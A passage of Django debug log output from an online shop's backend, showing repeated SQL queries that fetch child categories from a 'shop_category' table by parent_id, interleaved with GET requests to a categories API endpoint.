"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:17:55,290 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:17:55,293 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:17:55,296 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:17:55,300 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:17:55,303 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:17:55,306 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:17:55,310 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:17:55,313 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:17:55] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 09:17:55,944 utils 32506 139738707130112 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:17:55,955 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:17:55,961 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:17:55,966 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:17:55,972 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:17:55,976 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:17:55,981 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:17:55,985 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:17:55,989 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:17:55,996 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:17:56,000 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:17:56,004 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:17:56,008 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:17:56,012 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:17:56,018 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:17:56,022 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:17:56,026 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:17:56,030 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:17:56,034 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:17:56,040 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:17:56,044 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:17:56,048 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:17:56,052 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:17:56,056 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:17:56,060 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:17:56,066 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:17:56,070 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:17:56,075 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:17:56,079 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:17:56,083 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:17:56,089 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:17:56,093 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:17:56,098 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:17:56,102 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:17:56,106 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:17:56,113 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:17:56,117 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:17:56,121 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:17:56,125 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:17:56,129 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:17:56,133 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:17:56,138 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:17:56,142 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:17:56,146 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:17:56,151 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:17:56,155 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:17:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 09:18:02,147 utils 32506 139738707130112 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:18:02,158 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:18:02,163 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:18:02,166 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:18:02,171 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:18:02,175 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:18:02,177 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:18:02,179 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:18:02,181 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:18:02,185 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:18:02,187 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:18:02,189 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:18:02,191 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM 